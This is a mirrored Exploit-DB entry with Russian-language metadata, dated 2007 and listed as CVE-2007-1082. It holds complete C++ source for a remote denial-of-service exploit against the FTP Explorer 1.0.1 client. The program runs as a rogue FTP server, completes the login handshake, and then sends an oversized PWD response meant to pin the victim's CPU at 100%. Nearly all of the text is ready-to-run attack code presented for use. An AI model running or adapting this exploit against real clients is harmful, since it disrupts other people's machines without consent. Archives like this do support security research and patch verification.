- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3347
- Проверка EDB
-
- Пройдено
- Автор
- MARSU
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-1082
- Дата публикации
- 2007-02-20
C++:
/***********************************************************************************
* FTP Explorer 1.0.1 Build 047 Remote DoS (CPU consumption) *
* *
* FTP Explorer is prone to a DoS after receiving a long PWD response leading to *
* 100% CPU consumption. *
* Have Fun! *
* *
* Coded by Marsu <[email protected]> *
***********************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[30000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[+] FTP Explorer Remote CPU consumption DoS\n");
printf("[+] Coded and discovered by Marsu <[email protected]>\n");
printf("[*] Listening on port 21 ...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memcpy(evilbuff,"220 Hello there\r\n\0",18);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
//USER
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"331 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
//PASS
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"230 \r\n\0",7);
send(client,evilbuff,strlen(evilbuff),0);
//SYST
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
send(client,evilbuff,strlen(evilbuff),0);
//PWD
int i=5;
memset(recvbuff,'\0',1024);
recv(client,recvbuff,1024,0);
printf("%s", recvbuff);
while (i<25000) {
memset(evilbuff+i,'a',1);
i++;
memset(evilbuff+i,'/',1);
i++;
}
memcpy(evilbuff,"257 \"",5);
memcpy(evilbuff+25000,"\"\r\n\0",4);
send(client,evilbuff,strlen(evilbuff),0);
Sleep(100);
printf("[+] Must be 100%% CPU consuming\n");
closesocket(client);
closesocket(server);
return 0;
}
// milw0rm.com [2007-02-20]
- Источник
- www.exploit-db.com